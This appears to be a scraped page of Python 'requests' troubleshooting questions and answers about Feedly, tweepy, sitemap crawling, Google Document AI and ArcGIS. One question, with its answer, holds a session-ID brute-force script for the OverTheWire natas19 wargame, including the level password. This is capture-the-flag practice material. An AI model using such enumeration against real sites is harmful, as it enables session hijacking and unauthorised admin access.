I'm trying to access the Feedly API to collect and share articles automatically to a Facebook group. So far, I haven't even able to figure out how to use the Feedly API wrapper located here: https://github.com/zgw21cn/FeedlyClient
from feedlyclient import FeedlyClient
# Feedly
feedaccess = "removed"
myfeedId = "removed"
con = FeedlyClient()
con.get_feed_content(feedaccess,myfeedId,False,10000)
parsed = json.loads(con)
print json.dumps(parsed)
Terminal
PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py"
Traceback (most recent call last):
File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 8, in <module>
con = FeedlyClient.get_feed_content(feedaccess,myfeedId,False,10000)
TypeError: unbound method get_feed_content() must be called with FeedlyClient instance as first argument (got str instance instead)
PS D:\Python Projects\Python 2\fbauto> & python "d:/Python Projects/Python 2/fbauto/feedlytest.py"
Traceback (most recent call last):
File "d:/Python Projects/Python 2/fbauto/feedlytest.py", line 9, in <module>
con.get_feed_content(feedaccess,myfeedId,False,10000)
File "d:\Python Projects\Python 2\fbauto\feedlyclient.py", line 75, in get_feed_content
return res.json()
File "C:\Python27\lib\site-packages\requests\models.py", line 892, in json
return complexjson.loads(self.text, **kwargs)
File "C:\Python27\lib\json\__init__.py", line 339, in loads
return _default_decoder.decode(s)
File "C:\Python27\lib\json\decoder.py", line 364, in decode
obj, end = self.raw_decode(s, idx=_w(s, 0).end())
File "C:\Python27\lib\json\decoder.py", line 382, in raw_decode
raise ValueError("No JSON object could be decoded")
ValueError: No JSON object could be decoded
Please help.
SECOND ATTEMPT
import json
import requests
# Feedly
feedaccess = "REMOVED"
myfeedid = "user/REMOVED/category/tutorial"
def get_feed_content(unreadOnly=None, newerThan=None, count="10",
continuation=None,
ranked=None):
"""
return contents of a feed
:param access_token:
:param streamId:
:param unreadOnly:
:param newerThan:
:param count:
:param continuation:
:param ranked:
:return:
"""
headers = {'Authorization': 'OAuth ' + feedaccess}
quest_url = ('http://cloud.feedly.com/v3/streams/contents')
params = dict(streamId=myfeedid)
# Optional parameters
if unreadOnly is not None:
params['unreadOnly'] = unreadOnly
if newerThan is not None:
params['newerThan'] = newerThan
if count is not None:
params['count'] = count
if continuation is not None:
params['continuation'] = continuation
if ranked is not None:
params['ranked'] = ranked
res = requests.get(url=quest_url, params=params, headers=headers)
return res.json()
con = get_feed_content()
print json.dumps(con , indent=4)
TERMINAL
{
"items": [],
"id": "user/REMOVED/category/tutorial"
}
Just returns my user credentials. Feedly documentation says I can use category as stream ID. https://developer.feedly.com/v3/streams/
THIRD ATTEMPT
import json
import requests
from client import FeedlyClient
# Feedly
feedaccess = "REMOVED"
myfeedid = "user/REMOVED/category/tutorial"
feedcount = "20"
myurl = "http://cloud.feedly.com/v3/streams/contents?streamId=" + myfeedid + "&count=" + feedcount
headers = {'Authorization': 'OAuth ' + feedaccess}
res = requests.get(url=myurl, headers=headers)
con = res.json()
print json.dumps(con , indent=4)
SAME TERMINAL RESPONSE
The third attempt worked. There was a capitalization in my category name. It should be Tutorial not tutorial. Please see original post for code.
Related
So the issue is with this code.
import requests
import string
import binascii
import codecs
url="http://natas19.natas.labs.overthewire.org/"
user="natas19"
passwd="8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie=dict(PHPSESSID="0")
test="{}-admin"
for i in range(0,641):
with requests.Session() as sesh:
encoded=binascii.hexlify(bytes(test.format(i),"utf-8"))
print("Trying: " + str(i) + "-admin")
print(encoded)
cookie=dict(PHPSESSID=encoded)
sesh.post(url,auth=(user,passwd),cookies=cookie)
r=sesh.get(url,auth=(user,passwd)).content
print(r)
print(sesh.cookies.get_dict())
if "You are an admin." in str(r):
print("Success! Admin website:\n" + str(sesh.get(url,auth=(user,passwd)).content))
break;
else:
print("Failed.")
The hexlify returns a value like b'302d61646d696e', but the post later on considers it a string for some reason:
Trying: 0-admin
b'302d61646d696e'
Traceback (most recent call last):
File "C:/Users/jakub/Desktop/natas19.py", line 17, in <module>
sesh.post(url,auth=(user,passwd),cookies=cookie)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 635, in post
return self.request("POST", url, data=data, json=json, **kwargs)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 573, in request
prep = self.prepare_request(req)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\sessions.py", line 471, in prepare_request
cookies = cookiejar_from_dict(cookies)
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 537, in cookiejar_from_dict
cookiejar.set_cookie(create_cookie(name, cookie_dict[name]))
File "C:\Users\jakub\AppData\Local\Programs\Python\Python311\Lib\site-packages\requests\cookies.py", line 352, in set_cookie
and cookie.value.startswith('"')
TypeError: startswith first arg must be bytes or a tuple of bytes, not str
If I decode the hexlify result instead then the code runs, but without sending the cookie. Please help and thank you in advance!
Try to put .decode('utf-8') at the end of encoded=:
import requests
url = "http://natas19.natas.labs.overthewire.org/"
user = "natas19"
passwd = "8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s"
cookie = dict(PHPSESSID="0")
test = "{}-admin"
for i in range(0, 641):
with requests.Session() as sesh:
encoded = binascii.hexlify(bytes(test.format(i), "utf-8")).decode('utf-8') # <-- put decode() here!
print("Trying: " + str(i) + "-admin")
print(encoded)
cookie = dict(PHPSESSID=encoded)
sesh.post(url, auth=(user, passwd), cookies=cookie)
r = sesh.get(url, auth=(user, passwd)).content
print(r)
print(sesh.cookies.get_dict())
if "You are an admin." in str(r):
print(
"Success! Admin website:\n"
+ str(sesh.get(url, auth=(user, passwd)).content)
)
break
else:
print("Failed.")
this is hopefully my last question for this project since everything else is working fine. I can't figure out what's causing this error though. Here is the code for my tweepy bot:
import tweepy
import random
import os
import json
import boto3
read = tweepy.Client(os.getenv('btok'))
write = tweepy.Client(
consumer_key=os.getenv('ckey'),
consumer_secret=os.getenv('csec'),
access_token=os.getenv('atok'),
access_token_secret=os.getenv('atos')
)
# declaring variables
user_id = 1568306756798775297
greet = random.choice(list(open('greetings.txt'))) # picking a random greeting from the list
reply = random.choice(list(open('replies.txt'))) # picking a random reply from the list
strings = {'hi', 'hello', 'hey', 'hai'} # recognized greetings
dynamodb = boto3.resource('dynamodb')
table = dynamodb.Table('lastid')
def main(event, context):
# TODO implement
reply()
return {
'statusCode': 200,
'body': json.dumps('Hello from Lambda!')
}
def reply():
value = table.get_item(Key={'lastidkey': '1'})
last = value['Item']['lidval']
response = read.get_users_mentions(user_id, since_id=last) # fetching new mentions
for tweet in response.data:
text = tweet.text
id = tweet.id
if any(x in text.lower() for x in strings):
write.create_tweet(in_reply_to_tweet_id=id, text=greet) # if they're greeting the bot, the bot will greet them back
else:
write.create_tweet(in_reply_to_tweet_id=id, text=reply) # otherwise, it's a random reply
table.put_item(Item={'lastidkey': '1', 'lidval': str(tweet.id)}) # writes latest id to dynamodb
The "greeting" part works fine, but the part under else: does not work at all. Here is the error message I get:
{
"errorMessage": "Object of type function is not JSON serializable",
"errorType": "TypeError",
"requestId": "cb6423eb-e27e-4229-b322-c6df9fad3b5c",
"stackTrace": [
" File \"/var/task/reply.py\", line 25, in main\n reply()\n",
" File \"/var/task/reply.py\", line 41, in reply\n write.create_tweet(in_reply_to_tweet_id=id, text=reply) # otherwise, it's a random reply\n",
" File \"/opt/python/tweepy/client.py\", line 824, in create_tweet\n return self._make_request(\n",
" File \"/opt/python/tweepy/client.py\", line 126, in _make_request\n response = self.request(method, route, params=request_params,\n",
" File \"/opt/python/tweepy/client.py\", line 83, in request\n with self.session.request(\n",
" File \"/opt/python/requests/sessions.py\", line 573, in request\n prep = self.prepare_request(req)\n",
" File \"/opt/python/requests/sessions.py\", line 484, in prepare_request\n p.prepare(\n",
" File \"/opt/python/requests/models.py\", line 371, in prepare\n self.prepare_body(data, files, json)\n",
" File \"/opt/python/requests/models.py\", line 511, in prepare_body\n body = complexjson.dumps(json, allow_nan=False)\n",
" File \"/var/runtime/simplejson/__init__.py\", line 398, in dumps\n return cls(\n",
" File \"/var/runtime/simplejson/encoder.py\", line 296, in encode\n chunks = self.iterencode(o, _one_shot=True)\n",
" File \"/var/runtime/simplejson/encoder.py\", line 378, in iterencode\n return _iterencode(o, 0)\n",
" File \"/var/runtime/simplejson/encoder.py\", line 272, in default\n raise TypeError('Object of type %s is not JSON serializable' %\n"
]
}
Thanks everyone.
Solved it! In hindsight it was fairly obvious - the variable reply was throwing it off since it shares a name with the function. I renamed it and it works fine now.
I am iterating through a list of urls from a csv file trying to locate their sitemaps, however, I am getting a weird leading space issue that's causing an error to occur when requests processes each url. I'm trying to figure out what's causing this space to be generated and what type of space it is. I believe something funky is happening with strip() because I can get this to run fine when copying and pasting a url into requests. I am just not sure what type of space this is and what's causing it to occur.
Wondering if anyone else is having or had this issue?
So far I have tried to solve using the following methods:
replace()
"".join(split())
regex
Here is my code:
with open('links.csv') as f:
for line in f:
strdomain = line.strip()
if strdomain:
domain = strdomain
fix_domain = domain.replace('https://', '').replace('www', '').replace('/', '').replace('.', '').replace(' ', '')
ofile = fix_domain + '.txt' # args.ofile
domain_rem = domain
map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
url_info = find_sitemap.parse_sitemap(map)
print("Found {0} urls".format(len(url_info)))
new_urls = []
for u in url_info:
new_urls.append(u)
print(u)
links.csv look like the following with just one column:
https://site1.com/
https://site2.com/
https://site3.com/
I printed domain and strdomain and even added the word "this" next to the variable domain so you can see the space being produced clearly:
Here is the error I receive in full when running (you will notice there is no leading space within the url after I've copied and pasted from the terminal into here however I provide an image of my terminal below so you can see it):
Traceback (most recent call last):
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 358, in <module>
main()
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/map_website.py", line 318, in main
map = find_sitemap.get_sitemap(domain_rem+"sitemap.xml")
File "/Users/natehurwitz/PROJECTS/axis/axis/apps/axisDataFinder/find_sitemap.py", line 5, in get_sitemap
get_url = requests.get(url)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 72, in get
return request('get', url, params=params, **kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/api.py", line 58, in request
return session.request(method=method, url=url, **kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 522, in request
resp = self.send(prep, **send_kwargs)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 636, in send
adapter = self.get_adapter(url=request.url)
File "/Users/natehurwitz/Library/Caches/pypoetry/virtualenvs/axis-eSvach19-py3.9/lib/python3.9/site-packages/requests/sessions.py", line 727, in get_adapter
raise InvalidSchema("No connection adapters were found for '%s'" % url)
requests.exceptions.InvalidSchema: No connection adapters were found for 'https://blkgrn.com/sitemap.xml'
Here is where you can see the leading space that occurs
Here is the code for "find_sitemap.py":
from bs4 import BeautifulSoup
import requests
def get_sitemap(url):
get_url = requests.get(url)
if get_url.status_code == 200:
return get_url.text
else:
print ('Unable to fetch sitemap: %s.' % url)
def process_sitemap(s):
soup = BeautifulSoup(s, "lxml")
result = []
for loc in soup.findAll('loc'):
item = {}
item['loc'] = loc.text
item['tag'] = loc.parent.name
if loc.parent.lastmod is not None:
item['lastmod'] = loc.parent.lastmod.text
if loc.parent.changeFreq is not None:
item['changeFreq'] = loc.parent.changeFreq.text
if loc.parent.priority is not None:
item['priority'] = loc.parent.priority.text
result.append(item)
return result
def is_sub_sitemap(s):
if s['loc'].endswith('.xml') and s['tag'] == 'sitemap':
return True
else:
return False
def parse_sitemap(s):
sitemap = process_sitemap(s)
result = []
while sitemap:
candidate = sitemap.pop()
if is_sub_sitemap(candidate):
sub_sitemap = get_sitemap(candidate['loc'])
for i in process_sitemap(sub_sitemap):
sitemap.append(i)
else:
result.append(candidate)
return result
I am getting this error when trying to implement the Document OCR from google cloud in python as explained here: https://cloud.google.com/document-ai/docs/ocr
When I run
result = client.process_document(request=request)
I get this error
Traceback (most recent call last):
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/grpc_helpers.py", line 73, in error_remapped_callable
return callable_(*args, **kwargs)
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/grpc/_channel.py", line 923, in __call__
return _end_unary_response_blocking(state, call, False, None)
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/grpc/_channel.py", line 826, in _end_unary_response_blocking
raise _InactiveRpcError(state)
grpc._channel._InactiveRpcError: <_InactiveRpcError of RPC that terminated with:
status = StatusCode.INVALID_ARGUMENT
details = "Request contains an invalid argument."
debug_error_string = "{"created":"#1614769280.332675000","description":"Error received from peer ipv4:142.250.180.138:443","file":"src/core/lib/surface/call.cc","file_line":1068,"grpc_message":"Request contains an invalid argument.","grpc_status":3}"
>
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "<input>", line 1, in <module>
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/cloud/documentai_v1beta3/services/document_processor_service/client.py", line 327, in process_document
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/gapic_v1/method.py", line 145, in __call__
return wrapped_func(*args, **kwargs)
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/retry.py", line 281, in retry_wrapped_func
return retry_target(
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/retry.py", line 184, in retry_target
return target()
File "/Users/Niolo/Desktop/untitled/Desktop/lib/python3.8/site-packages/google/api_core/grpc_helpers.py", line 75, in error_remapped_callable
six.raise_from(exceptions.from_grpc_error(exc), exc)
File "<string>", line 3, in raise_from
google.api_core.exceptions.InvalidArgument: 400 Request contains an invalid argument.
My full code:
import os
# Import the base64 encoding library.
project_id= 'your-project-id'
location = 'eu' # Format is 'us' or 'eu'
processor_id = 'your-processor-id' # Create processor in Cloud Console
file_path = '/file_path/invoice.pdf'
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "/full_path/your_credentials.json"
def process_document_sample(
project_id: str, location: str, processor_id: str, file_path: str
):
from google.cloud import documentai_v1beta3 as documentai
# Instantiates a client
client = documentai.DocumentProcessorServiceClient()
# The full resource name of the processor, e.g.:
# projects/project-id/locations/location/processor/processor-id
# You must create new processors in the Cloud Console first
name = f"projects/{project_id}/locations/{location}/processors/{processor_id}"
with open(file_path, "rb") as image:
image_content = image.read()
# Read the file into memory
document = {"content": image_content, "mime_type": "application/pdf"}
# Configure the process request
request = {"name": name, "document": document}
# Recognizes text entities in the PDF document
result = client.process_document(request=request)
document = result.document
print("Document processing complete.")
# For a full list of Document object attributes, please reference this page: https://googleapis.dev/python/documentai/latest/_modules/google/cloud/documentai_v1beta3/types/document.html#Document
document_pages = document.pages
# Read the text recognition output from the processor
print("The document contains the following paragraphs:")
for page in document_pages:
paragraphs = page.paragraphs
for paragraph in paragraphs:
paragraph_text = get_text(paragraph.layout, document)
print(f"Paragraph text: {paragraph_text}")
client = documentai.DocumentProcessorServiceClient() points to US end point by default.
in: client = documentai.DocumentProcessorServiceClient()
in: print(client.DEFAULT_ENDPOINT)
out: us-documentai.googleapis.com
You need to override the api_endpoint to EU for this to work.
from google.api_core.client_options import ClientOptions
# Set endpoint to EU
options = ClientOptions(api_endpoint="eu-documentai.googleapis.com:443")
# Instantiates a client
client = documentai.DocumentProcessorServiceClient(client_options=options)
Here is the full code:
import os
# TODO(developer): Uncomment these variables before running the sample.
project_id= 'your-project-id'
location = 'eu' # Format is 'us' or 'eu'
processor_id = 'your-processor-id' # Create processor in Cloud Console
file_path = '/file_path/invoice.pdf'
os.environ["GOOGLE_APPLICATION_CREDENTIALS"] = "/full_path/your_credentials.json"
def process_document_sample(
project_id: str, location: str, processor_id: str, file_path: str
):
from google.cloud import documentai_v1beta3 as documentai
from google.api_core.client_options import ClientOptions
# Set endpoint to EU
options = ClientOptions(api_endpoint="eu-documentai.googleapis.com:443")
# Instantiates a client
client = documentai.DocumentProcessorServiceClient(client_options=options)
# The full resource name of the processor, e.g.:
# projects/project-id/locations/location/processor/processor-id
# You must create new processors in the Cloud Console first
name = f"projects/{project_id}/locations/{location}/processors/{processor_id}"
with open(file_path, "rb") as image:
image_content = image.read()
# Read the file into memory
document = {"content": image_content, "mime_type": "application/pdf"}
# Configure the process request
request = {"name": name, "document": document}
# Recognizes text entities in the PDF document
result = client.process_document(request=request)
document = result.document
print("Document processing complete.")
# For a full list of Document object attributes, please reference this page: https://googleapis.dev/python/documentai/latest/_modules/google/cloud/documentai_v1beta3/types/document.html#Document
document_pages = document.pages
# Read the text recognition output from the processor
print("The document contains the following paragraphs:")
for page in document_pages:
paragraphs = page.paragraphs
for paragraph in paragraphs:
paragraph_text = get_text(paragraph.layout, document)
print(f"Paragraph text: {paragraph_text}")
Here is a snippet of the output:
I am developing an application on App Engine and Python. This app is meant to create routes to several points in town. To create this routes, I invoke a request to an Arcgis service. Once that is done, I need to check the status of the request and get a JSON with the results. I check these results with the following method:
def store_route(job_id, token):
import requests, json
#Process stops result and store it as json in stops_response
stops_url = "https://logistics.arcgis.com/arcgis/rest/services/World/VehicleRoutingProblem/GPServer/SolveVehicleRoutingProblem/jobs/"
stops_url = stops_url+str(job_id)+"/results/out_stops?token="+str(token)+"&f=json"
stops_r = requests.get(stops_url)
stops_response = json.loads(stops_r.text)
#Process routes result and store it as json in routes_response
routes_url = "https://logistics.arcgis.com/arcgis/rest/services/World/VehicleRoutingProblem/GPServer/SolveVehicleRoutingProblem/jobs/"
routes_url = routes_url+str(job_id)+"/results/out_routes?token="+str(token)+"&f=json"
routes_r = requests.get(routes_url)
routes_response = json.loads(routes_r.text)
from routing.models import ArcGisJob, DeliveryRoute
#Process each route from response
processed_routes = []
for route_info in routes_response['value']['features']:
print route_info
route_name = route_info['attributes']['Name']
coordinates = route_info['geometry']['paths']
coordinates_json = {"coordinates": coordinates}
#Process stops from each route
stops = []
for route_stops in stops_response['value']['features']:
if route_name == route_stops['attributes']['RouteName']:
stops.append({"Name": route_stops['attributes']['Name'],
"Sequence": route_stops['attributes']['Sequence']})
stops_json = {"content": stops}
#Create new Delivery Route object
processed_routes.append(DeliveryRoute(name=route_name,route_coordinates=coordinates_json, stops=stops_json))
#insert a new Job table entry with all processed routes
new_job = ArcGisJob(job_id=str(job_id), routes=processed_routes)
new_job.put()
As you can see, what my code does is practically visit the JSON returned by the service and parse it for the content that interest me. The problem is I get the following output:
{u'attributes': {
u'Name': u'ruta_4855443348258816',
...
u'StartTime': 1427356800000},
u'geometry': {u'paths': [[[-100.37766063699996, 25.67669987000005],
...
[-100.37716999999998, 25.67715000000004],
[-100.37766063699996, 25.67669987000005]]]}}
ERROR 2015-03-26 19:02:58,405 handlers.py:73] 'geometry'
Traceback (most recent call last):
File "/Users/Vercetti/Dropbox/Logyt/Quaker Routing/logytrouting/routing/handlers.py", line 68, in get
arc_gis.store_route(job_id, token)
File "/Users/Vercetti/Dropbox/Logyt/Quaker Routing/logytrouting/libs/arc_gis.py", line 150, in store_route
coordinates = route_info['geometry']['paths']
KeyError: 'geometry'
ERROR 2015-03-26 19:02:58,412 BaseRequestHandler.py:51] Traceback (most recent call last):
File "/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine/lib/webapp2-2.5.2/webapp2.py", line 570, in dispatch
return method(*args, **kwargs)
File "/Users/Vercetti/Dropbox/Logyt/Quaker Routing/logytrouting/routing/handlers.py", line 68, in get
arc_gis.store_route(job_id, token)
File "/Users/Vercetti/Dropbox/Logyt/Quaker Routing/logytrouting/libs/arc_gis.py", line 150, in store_route
coordinates = route_info['geometry']['paths']
KeyError: 'geometry'
The actual JSON returned has a lot more of info, but i just wrote a little portion of it so you can see that there IS a 'geometry' key. Any idea why I get this error??